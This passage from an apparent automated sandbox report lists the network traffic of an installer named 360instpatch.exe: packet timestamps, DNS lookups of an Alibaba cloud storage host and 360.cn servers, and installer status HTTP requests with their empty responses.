                                                                                                                                                                                                            Dec 29, 2024 09:02:11.442272902 CET80100041.192.136.132192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.493608952 CET233633478192.168.2.41.192.136.171
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.493678093 CET233643478192.168.2.41.192.136.170
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.493716955 CET233643478192.168.2.41.192.136.170
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.493738890 CET2336315054192.168.2.48.46.123.189
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.571297884 CET3478233631.192.136.170192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.685421944 CET233633478192.168.2.41.192.136.171
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.685448885 CET233643478192.168.2.41.192.136.170
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.685470104 CET233643478192.168.2.41.192.136.170
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.685492992 CET2336315054192.168.2.48.46.123.189
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.800767899 CET3478233631.192.136.170192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.904251099 CET233633478192.168.2.41.192.136.171
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.904428959 CET233643478192.168.2.41.192.136.170
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.904463053 CET233643478192.168.2.41.192.136.170
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.904489040 CET2336315054192.168.2.48.46.123.189
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.123279095 CET233633478192.168.2.41.192.136.171
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.123385906 CET233643478192.168.2.41.192.136.170
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.123416901 CET233643478192.168.2.41.192.136.170
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.123440027 CET2336315054192.168.2.48.46.123.189
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.341375113 CET233633478192.168.2.41.192.136.171
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.341406107 CET233643478192.168.2.41.192.136.170
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.341423035 CET233643478192.168.2.41.192.136.170
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.341444016 CET2336315054192.168.2.48.46.123.189
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.560292959 CET233633478192.168.2.41.192.136.171
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.560369015 CET233643478192.168.2.41.192.136.170
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.560393095 CET233643478192.168.2.41.192.136.170
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.560406923 CET2336315054192.168.2.48.46.123.189
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.778867960 CET233633478192.168.2.41.192.136.171
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.778897047 CET233643478192.168.2.41.192.136.170
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.778911114 CET233643478192.168.2.41.192.136.170
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.778975964 CET2336315054192.168.2.48.46.123.189
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.864125013 CET3478233631.192.136.171192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.864176035 CET3478233631.192.136.171192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.864190102 CET3478233631.192.136.171192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.864206076 CET3478233631.192.136.171192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.904548883 CET3478233631.192.136.171192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.998053074 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                                                            Dec 29, 2024 09:02:13.106839895 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                                                            Dec 29, 2024 09:02:13.121140957 CET3478233631.192.136.171192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:13.327155113 CET3478233631.192.136.171192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:13.549972057 CET80100041.192.136.132192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:13.670500994 CET80100041.192.136.132192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:14.017611980 CET5332153192.168.2.41.1.1.1
                                                                                                                                                                                                            Dec 29, 2024 09:02:14.017637968 CET5390953192.168.2.41.1.1.1
                                                                                                                                                                                                            Dec 29, 2024 09:02:14.156692982 CET53533211.1.1.1192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:15.013144016 CET5390953192.168.2.41.1.1.1
                                                                                                                                                                                                            Dec 29, 2024 09:02:15.282728910 CET53539091.1.1.1192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:15.282752037 CET53539091.1.1.1192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:13.263298035 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                                                            Dec 29, 2024 09:03:13.372637987 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                                                            Dec 29, 2024 09:03:13.591274023 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                                                            Dec 29, 2024 09:03:13.919424057 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                                                            Dec 29, 2024 09:03:14.148983002 CET80100041.192.136.132192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:14.149255991 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                                                            Dec 29, 2024 09:03:14.247618914 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                                                            Dec 29, 2024 09:03:14.356998920 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                                                            Dec 29, 2024 09:03:14.473454952 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                                                            Dec 29, 2024 09:03:14.511356115 CET80100041.192.136.132192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:14.511544943 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                                                            Dec 29, 2024 09:03:14.575747967 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                                                            Dec 29, 2024 09:03:14.685033083 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                                                            Dec 29, 2024 09:03:14.702944040 CET80100041.192.136.132192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:14.794289112 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                                                            Dec 29, 2024 09:03:14.903850079 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                                                            Dec 29, 2024 09:03:14.911745071 CET80100041.192.136.132192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:15.028691053 CET80100041.192.136.132192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:15.122781038 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                                                            Dec 29, 2024 09:03:15.341618061 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                                                            Dec 29, 2024 09:03:15.341686964 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                                                            Dec 29, 2024 09:03:15.450596094 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                                                            Dec 29, 2024 09:03:15.450696945 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                                                            Dec 29, 2024 09:03:15.560055017 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                                                            Dec 29, 2024 09:03:15.560240984 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                                                            Dec 29, 2024 09:03:15.669410944 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                                                            Dec 29, 2024 09:03:15.669459105 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                                                            Dec 29, 2024 09:03:15.778726101 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                                                            Dec 29, 2024 09:03:15.888161898 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                                                            Dec 29, 2024 09:03:15.997531891 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                                                            Dec 29, 2024 09:03:16.106844902 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                                                            Dec 29, 2024 09:03:16.216236115 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                                                            Dec 29, 2024 09:03:16.325675964 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                                                            Dec 29, 2024 09:03:16.435165882 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                                                            Dec 29, 2024 09:03:16.544915915 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                                                            Dec 29, 2024 09:03:16.653949022 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                                                            Dec 29, 2024 09:03:16.763221025 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                                                            Dec 29, 2024 09:03:16.816519022 CET80100041.192.136.134192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:16.816556931 CET80100041.192.136.134192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:16.816592932 CET80100041.192.136.134192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:16.872781038 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                                                            Dec 29, 2024 09:03:16.885987997 CET80100041.192.136.134192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:16.918523073 CET80100041.192.136.135192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:16.918710947 CET80100041.192.136.135192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:16.983709097 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                                                            Dec 29, 2024 09:03:17.091232061 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                                                            Dec 29, 2024 09:03:17.203706026 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                                                            Dec 29, 2024 09:03:17.309964895 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                                                            Dec 29, 2024 09:03:17.419385910 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                                                            Dec 29, 2024 09:03:17.529716015 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                                                            Dec 29, 2024 09:03:17.619446039 CET80100041.192.136.134192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:17.638261080 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                                                            Dec 29, 2024 09:03:17.765964031 CET80100041.192.136.134192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:17.859709978 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                                                            Dec 29, 2024 09:03:17.966213942 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                                                            Dec 29, 2024 09:03:18.076265097 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                                                            Dec 29, 2024 09:03:18.184967041 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                                                            Dec 29, 2024 09:03:18.210932970 CET80100041.192.136.134192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:18.294384956 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                                                            Dec 29, 2024 09:03:18.404675961 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                                                            Dec 29, 2024 09:03:18.435652018 CET80100041.192.136.135192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:18.513411999 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                                                            Dec 29, 2024 09:03:18.623295069 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                                                            Dec 29, 2024 09:03:18.731978893 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                                                            Dec 29, 2024 09:03:18.759798050 CET80100041.192.136.134192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:18.841214895 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                                                            Dec 29, 2024 09:03:18.908266068 CET80100041.192.136.135192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:18.959465981 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                                                            Dec 29, 2024 09:03:19.059981108 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                                                            Dec 29, 2024 09:03:19.169368982 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                                                            Dec 29, 2024 09:03:19.187354088 CET80100041.192.136.134192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:19.279715061 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                                                            Dec 29, 2024 09:03:19.304423094 CET80100041.192.136.135192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:19.388612986 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                                                            Dec 29, 2024 09:03:19.497468948 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                                                            Dec 29, 2024 09:03:19.607707977 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                                                            Dec 29, 2024 09:03:19.632318974 CET80100041.192.136.134192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:19.719144106 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                                                            Dec 29, 2024 09:03:19.825757027 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                                                            Dec 29, 2024 09:03:19.935992002 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                                                            Dec 29, 2024 09:03:20.044596910 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                                                            Dec 29, 2024 09:03:20.075851917 CET80100041.192.136.134192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:20.154305935 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                                                            Dec 29, 2024 09:03:20.178620100 CET80100041.192.136.135192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:20.263417959 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                                                            Dec 29, 2024 09:03:20.373389959 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                                                            Dec 29, 2024 09:03:20.482121944 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                                                            Dec 29, 2024 09:03:20.497277975 CET80100041.192.136.134192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:20.591198921 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                                                            Dec 29, 2024 09:03:20.635018110 CET80100041.192.136.135192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:20.952109098 CET80100041.192.136.134192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:21.052665949 CET80100041.192.136.135192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:23.106942892 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                                                            Dec 29, 2024 09:03:23.666398048 CET80100041.192.136.134192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:23.765760899 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                                                            Dec 29, 2024 09:03:26.279042959 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                                                            Dec 29, 2024 09:03:28.576025963 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                                                            Dec 29, 2024 09:03:30.982026100 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                                                            Dec 29, 2024 09:03:33.497562885 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                                                            Dec 29, 2024 09:03:35.575824022 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                                                            Dec 29, 2024 09:03:36.158420086 CET80100041.192.136.135192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:36.232105970 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                                                            Dec 29, 2024 09:03:38.309977055 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                                                            Dec 29, 2024 09:03:40.827238083 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                                                            Dec 29, 2024 09:03:43.013489962 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                                                            Dec 29, 2024 09:03:43.599342108 CET80100041.192.136.135192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:43.669461012 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                                                            Dec 29, 2024 09:03:46.076172113 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                                                            Dec 29, 2024 09:03:46.637296915 CET80100041.192.136.134192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:46.731862068 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                                                            Dec 29, 2024 09:03:49.466480970 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                                                            Dec 29, 2024 09:03:50.404820919 CET80100041.192.136.134192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:50.450795889 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                                                            Dec 29, 2024 09:03:51.022344112 CET80100041.192.136.134192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:51.107028008 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                                                            Dec 29, 2024 09:03:53.403846979 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                                                            Dec 29, 2024 09:03:55.700896978 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                                                            Dec 29, 2024 09:03:58.326112032 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                                                            Dec 29, 2024 09:03:58.924230099 CET80100041.192.136.134192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:58.981945038 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                                                            Dec 29, 2024 09:04:01.061175108 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                                                            Dec 29, 2024 09:04:01.633156061 CET80100041.192.136.134192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:04:01.828007936 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                                                            Dec 29, 2024 09:04:02.408521891 CET80100041.192.136.135192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:04:02.482549906 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                                                            Dec 29, 2024 09:04:04.781172037 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                                                            Dec 29, 2024 09:04:05.353230953 CET80100041.192.136.134192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:04:05.434978962 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                                                            Dec 29, 2024 09:04:06.012557030 CET80100041.192.136.134192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:04:06.092067003 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                                                            Dec 29, 2024 09:04:57.606870890 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                                                            Dec 29, 2024 09:04:58.193104982 CET80100041.192.136.135192.168.2.4

                                                                                                                                                                                                            ICMP Packets

                                                                                                                                                                                                            TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                            Dec 29, 2024 09:02:13.121221066 CET192.168.2.41.192.136.1714a66(Port unreachable)Destination Unreachable

                                                                                                                                                                                                            DNS Queries

                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                            Dec 29, 2024 09:01:57.980811119 CET192.168.2.41.1.1.10x6652Standard query (0)gwwifha84989.oss-ap-northeast-2.aliyuncs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Dec 29, 2024 09:02:09.367391109 CET192.168.2.41.1.1.10xfb0bStandard query (0)s.360.cnA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Dec 29, 2024 09:02:09.554183006 CET192.168.2.41.1.1.10x260Standard query (0)st.p.360.cnA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Dec 29, 2024 09:02:09.720099926 CET192.168.2.41.1.1.10x8baaStandard query (0)agt.p.360.cnA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Dec 29, 2024 09:02:09.720355034 CET192.168.2.41.1.1.10xd43aStandard query (0)tr.p.360.cnA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Dec 29, 2024 09:02:14.017611980 CET192.168.2.41.1.1.10xffedStandard query (0)agd.p.360.cnA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Dec 29, 2024 09:02:14.017637968 CET192.168.2.41.1.1.10xce55Standard query (0)pinst.360.cnA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Dec 29, 2024 09:02:15.013144016 CET192.168.2.41.1.1.10xce55Standard query (0)pinst.360.cnA (IP address)IN (0x0001)false

                                                                                                                                                                                                            DNS Answers

                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                            Dec 29, 2024 09:01:58.441051960 CET1.1.1.1192.168.2.40x6652No error (0)gwwifha84989.oss-ap-northeast-2.aliyuncs.com149.129.12.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Dec 29, 2024 09:02:09.783198118 CET1.1.1.1192.168.2.40xfb0bNo error (0)s.360.cn180.163.251.230A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Dec 29, 2024 09:02:09.783198118 CET1.1.1.1192.168.2.40xfb0bNo error (0)s.360.cn171.8.167.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Dec 29, 2024 09:02:09.783198118 CET1.1.1.1192.168.2.40xfb0bNo error (0)s.360.cn171.13.14.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Dec 29, 2024 09:02:09.783198118 CET1.1.1.1192.168.2.40xfb0bNo error (0)s.360.cn171.8.167.89A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Dec 29, 2024 09:02:09.965209961 CET1.1.1.1192.168.2.40x260No error (0)st.p.360.cn1.192.136.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Dec 29, 2024 09:02:10.108865976 CET1.1.1.1192.168.2.40xd43aNo error (0)tr.p.360.cn1.192.136.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Dec 29, 2024 09:02:10.108865976 CET1.1.1.1192.168.2.40xd43aNo error (0)tr.p.360.cn1.192.136.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Dec 29, 2024 09:02:10.108865976 CET1.1.1.1192.168.2.40xd43aNo error (0)tr.p.360.cn1.192.136.134A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Dec 29, 2024 09:02:10.108865976 CET1.1.1.1192.168.2.40xd43aNo error (0)tr.p.360.cn1.192.136.135A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Dec 29, 2024 09:02:10.134640932 CET1.1.1.1192.168.2.40x8baaNo error (0)agt.p.360.cn1.192.136.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Dec 29, 2024 09:02:10.134640932 CET1.1.1.1192.168.2.40x8baaNo error (0)agt.p.360.cn1.192.136.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Dec 29, 2024 09:02:14.156692982 CET1.1.1.1192.168.2.40xffedNo error (0)agd.p.360.cnagd2.p.360.cnCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Dec 29, 2024 09:02:14.156692982 CET1.1.1.1192.168.2.40xffedNo error (0)agd2.p.360.cn1.192.194.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Dec 29, 2024 09:02:14.156692982 CET1.1.1.1192.168.2.40xffedNo error (0)agd2.p.360.cn1.192.194.215A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Dec 29, 2024 09:02:15.282728910 CET1.1.1.1192.168.2.40xce55No error (0)pinst.360.cnsoftm.update.360safe.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Dec 29, 2024 09:02:15.282728910 CET1.1.1.1192.168.2.40xce55No error (0)softm.update.360safe.comseupdate.360qhcdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Dec 29, 2024 09:02:15.282728910 CET1.1.1.1192.168.2.40xce55No error (0)seupdate.360qhcdn.com39.156.85.231A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Dec 29, 2024 09:02:15.282728910 CET1.1.1.1192.168.2.40xce55No error (0)seupdate.360qhcdn.com39.156.85.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Dec 29, 2024 09:02:15.282728910 CET1.1.1.1192.168.2.40xce55No error (0)seupdate.360qhcdn.com39.156.85.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Dec 29, 2024 09:02:15.282752037 CET1.1.1.1192.168.2.40xce55No error (0)pinst.360.cnsoftm.update.360safe.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Dec 29, 2024 09:02:15.282752037 CET1.1.1.1192.168.2.40xce55No error (0)softm.update.360safe.comseupdate.360qhcdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Dec 29, 2024 09:02:15.282752037 CET1.1.1.1192.168.2.40xce55No error (0)seupdate.360qhcdn.com39.156.85.231A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Dec 29, 2024 09:02:15.282752037 CET1.1.1.1192.168.2.40xce55No error (0)seupdate.360qhcdn.com39.156.85.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Dec 29, 2024 09:02:15.282752037 CET1.1.1.1192.168.2.40xce55No error (0)seupdate.360qhcdn.com39.156.85.200A (IP address)IN (0x0001)false

                                                                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                                                                            • gwwifha84989.oss-ap-northeast-2.aliyuncs.com
                                                                                                                                                                                                            • s.360.cn
                                                                                                                                                                                                            • pinst.360.cn

                                                                                                                                                                                                            HTTP Packets

                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            0192.168.2.449739180.163.251.230804460C:\Users\user\Downloads\360instpatch.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Dec 29, 2024 09:02:09.904696941 CET398OUTGET /safe/instcomp.htm?soft=1000&status=100&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                            Host: s.360.cn
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.515594959 CET240INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: openresty/1.15.8.2
                                                                                                                                                                                                            Date: Sun, 29 Dec 2024 08:02:11 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                            Last-Modified: Fri, 27 Jul 2018 07:11:44 GMT
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            ETag: "5b5ac5b0-0"
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.637595892 CET428OUTGET /safe/instcomp.htm?soft=1000&status=127&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&parent=Non-existent%20Process&ver=13.0.0.1231&pid= HTTP/1.1
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                            Host: s.360.cn
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.185935020 CET240INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: openresty/1.15.8.2
                                                                                                                                                                                                            Date: Sun, 29 Dec 2024 08:02:11 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                            Last-Modified: Fri, 27 Jul 2018 07:11:44 GMT
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            ETag: "5b5ac5b0-0"
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.187710047 CET398OUTGET /safe/instcomp.htm?soft=1000&status=109&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                            Host: s.360.cn
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.739072084 CET240INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: openresty/1.15.8.2
                                                                                                                                                                                                            Date: Sun, 29 Dec 2024 08:02:12 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                            Last-Modified: Fri, 27 Jul 2018 07:11:44 GMT
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            ETag: "5b5ac5b0-0"
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.744915962 CET385OUTGET /safe/instcomp.htm?soft=1000&status=12&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1
                                                                                                                                                                                                            Accept: */*
